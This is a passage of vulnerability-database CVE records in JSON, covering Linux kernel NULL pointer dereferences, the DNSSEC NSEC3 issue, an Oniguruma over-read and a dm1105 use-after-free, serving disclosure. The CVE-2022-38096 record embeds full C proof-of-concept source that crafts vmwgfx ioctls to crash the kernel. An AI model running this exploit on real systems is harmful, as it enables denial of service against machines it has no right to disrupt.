causing kernel panic and a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:30:14.909Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "name": "RHSA-2024:3810", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3810" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6536" }, { "name": "RHBZ#2254052", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254052" } ], "timeline": [ { "lang": "en", "time": "2023-12-11T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-11T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: null pointer dereference in __nvmet_req_complete", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module nvmet-tcp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6536", "datePublished": "2024-02-07T21:05:13.716Z", "dateReserved": "2023-12-05T21:00:40.604Z", "dateUpdated": "2024-09-13T23:30:14.909Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-38096
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-16 19:46
Severity ?
EPSS score ?
Summary
There is a NULL pointer vulnerability in vmwgfx driver
References
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "linux_kernel", "vendor": "linux", "versions": [ { "lessThan": "5.14", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2022-38096", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-26T13:45:25.191519Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-26T13:49:29.690Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-03T10:45:52.802Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073" }, { "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-25T21:08:05.642043", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073" }, { "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073" ], "discovery": "INTERNAL" }, "title": "There is a NULL pointer vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-38096", "datePublished": "2022-09-09T14:39:51.163117Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-16T19:46:43.355Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-50868
Vulnerability from cvelistv5
Published
2024-02-14 00:00
Modified
2024-08-02 22:23
Severity ?
EPSS score ?
Summary
The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:23:43.905Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "tags": [ "x_transferred" ], "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "tags": [ "x_transferred" ], "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "tags": [ "x_transferred" ], "url": "https://datatracker.ietf.org/doc/html/rfc5155" }, { "tags": [ "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2023-50868" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "tags": [ "x_transferred" ], "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-50868" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219826" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240307-0008/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the \"NSEC3\" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T16:14:14.129606", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "url": "https://datatracker.ietf.org/doc/html/rfc5155" }, { "url": "https://kb.isc.org/docs/cve-2023-50868" }, { "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-50868" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219826" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "url": "https://security.netapp.com/advisory/ntap-20240307-0008/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-50868", "datePublished": "2024-02-14T00:00:00", "dateReserved": "2023-12-14T00:00:00", "dateUpdated": "2024-08-02T22:23:43.905Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2166
Vulnerability from cvelistv5
Published
2023-04-19 00:00
Modified
2024-08-02 06:12
Severity ?
EPSS score ?
Summary
A null pointer dereference issue was found in can protocol in net/can/af_can.c in the Linux before Linux. ml_priv may not be initialized in the receive path of CAN frames. A local user could use this flaw to crash the system or potentially cause a denial of service.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:12:20.539Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/CAO4mrfcV_07hbj8NUuZrA8FH-kaRsrFy-2metecpTuE5kKHn5w%40mail.gmail.com/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux Kernel version prior to Kernel 6.1 RC9" } ] } ], "descriptions": [ { "lang": "en", "value": "A null pointer dereference issue was found in can protocol in net/can/af_can.c in the Linux before Linux. ml_priv may not be initialized in the receive path of CAN frames. A local user could use this flaw to crash the system or potentially cause a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-19T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/CAO4mrfcV_07hbj8NUuZrA8FH-kaRsrFy-2metecpTuE5kKHn5w%40mail.gmail.com/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-2166", "datePublished": "2023-04-19T00:00:00", "dateReserved": "2023-04-18T00:00:00", "dateUpdated": "2024-08-02T06:12:20.539Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-19203
Vulnerability from cvelistv5
Published
2019-11-21 20:06
Modified
2024-08-05 02:09
Severity ?
EPSS score ?
Summary
An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read.
References
▼ | URL | Tags |
---|---|---|
https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2 | x_refsource_MISC | |
https://github.com/kkos/oniguruma/issues/163 | x_refsource_MISC | |
https://github.com/ManhNDd/CVE-2019-19203 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/ | vendor-advisory, x_refsource_FEDORA | |
https://github.com/tarantula-team/CVE-2019-19203 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T02:09:39.577Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/issues/163" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/ManhNDd/CVE-2019-19203" }, { "name": "FEDORA-2019-d942abd0d4", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "FEDORA-2019-73197ff9a0", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/tarantula-team/CVE-2019-19203" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-12-24T14:18:55", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/issues/163" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/ManhNDd/CVE-2019-19203" }, { "name": "FEDORA-2019-d942abd0d4", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "FEDORA-2019-73197ff9a0", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/tarantula-team/CVE-2019-19203" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-19203", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "name": "https://github.com/kkos/oniguruma/issues/163", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/issues/163" }, { "name": "https://github.com/ManhNDd/CVE-2019-19203", "refsource": "MISC", "url": "https://github.com/ManhNDd/CVE-2019-19203" }, { "name": "FEDORA-2019-d942abd0d4", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "FEDORA-2019-73197ff9a0", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "name": "https://github.com/tarantula-team/CVE-2019-19203", "refsource": "MISC", "url": "https://github.com/tarantula-team/CVE-2019-19203" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-19203", "datePublished": "2019-11-21T20:06:59", "dateReserved": "2019-11-21T00:00:00", "dateUpdated": "2024-08-05T02:09:39.577Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-35824
Vulnerability from cvelistv5
Published
2023-06-18 00:00
Modified
2024-08-02 16:30
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in dm1105_remove in drivers/media/pci/dm1105/dm1105.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T16:30:45.338Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/49bb0b6a-e669-d4e7-d742-a19d2763e947%40xs4all.nl/" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20230318081506.795147-1-zyytlz.wz%40163.com/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5abda7a16698d4d1f47af1168d8fa2c640116b4a" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230803-0002/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ 